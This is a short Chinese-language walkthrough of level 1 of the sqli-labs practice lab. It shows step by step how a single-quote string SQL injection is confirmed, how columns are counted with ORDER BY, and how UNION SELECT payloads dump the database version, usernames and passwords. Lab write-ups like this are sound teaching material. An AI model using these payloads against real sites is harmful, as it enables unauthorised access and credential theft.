sqli-labs第一关

sqli-labs通关记录

1.判断是否可以注入

输入?id=1

输入?id=2

由此可以判断出可以进行注入

2.判断什么类型的注入

输入?id=1'

输入?id=1' --+

可以看出第一次输入结果出现错误，第二次输入页面回显正常，说明是单引号字符型注入

3. 判断数据列数

输入?id=1' order by 1 --+
输入?id=1' order by 2 --+
输入?id=1' order by 3 --+
输入?id=1' order by 4 --+
当到4时发生错误，说明他只有三列数据

4.判断显示位

输入?id=555' union select 1,2,3 --+

可以看出仅有两个显示位

5.对数据库进行爆破，查询所需信息

输入?id=-1' union select 1,version(),database() --+

查询到数据库的版本和命名

输入?id=-1' union select 1,2,group_concat(username)from security.users--+

查询到用户名
输入?id=-1' union select 1,2,group_concat(password)from security.users--+